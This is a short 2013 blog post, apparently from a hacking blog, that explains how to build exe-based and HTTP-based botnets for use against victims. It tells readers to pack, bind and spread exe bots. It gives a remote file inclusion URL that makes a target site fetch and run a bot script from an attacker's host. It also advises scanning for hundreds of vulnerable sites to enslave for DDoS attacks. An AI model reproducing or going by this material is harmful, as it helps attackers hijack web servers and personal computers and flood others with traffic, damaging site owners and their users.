Sunday, September 29, 2013

Botnet Tutorial


Hello Guy's

In this tutorial, i'll introduce how to build a botnet.
But I'm sure some of you've learned about botnets and i'll not go in details.




There are two main types of botnet.
1. Exe based botnet.
2. Http based botnet.

1.What is a Exe based botnet.???

As u already know, exe based botnet is very popular in hacking community.
There are so many source codes for the exe based botnets.
They need to compile and build an exe.
(That exe is a client and when the victim run that, his machine or his pc will join a channel of the IRC server)
After you create an exe, pack it, bind it and spread it on the net.
You can spread it by so many ways.
I'll post the exe based botnet video tutorials by watch guard network security later.
In summary, exe based bots are mainly used for windows machines.


2.What is a Http based botnet???


Http based bots are mostly php bot and perl bot.
None of them are exe bots.
They are used together with RFI or SQLi attacks.
When a site is backdoored with a shell.
The attacker upload a php and run it.
If so , the hacked site join to the IRC server and that site act as a zombie.
I'll show an example.

http://www.target.com/vul.php?hack_root=www.hacker.com/bot.txt???
It's the same method with RFI exploit.
When you inject the code like above, www.target.com will join to your server.
So, you need to find RFI vulnerable links to get or to collect so many zombies.
But, collecting RFI vulnerable links is not a difficult work.
You can use RFI scanner bots and can get thousand of RFI links.
When you get more than 200 sites, you can DDOS.
In summary, http botnet is mainly used for web servers.
It works on windows and linux server.

Hint : 200 zombies of http botnet may more powerful than 200 zombies of exe botnet.
Reason : The power of botnet depend on the number of IP and the zombie machine.

P.S --- you need to edit the php bot source code.
If somebody here has some problems to build a botnet, PM me.
I'll post in detail later.

No comments:

Post a Comment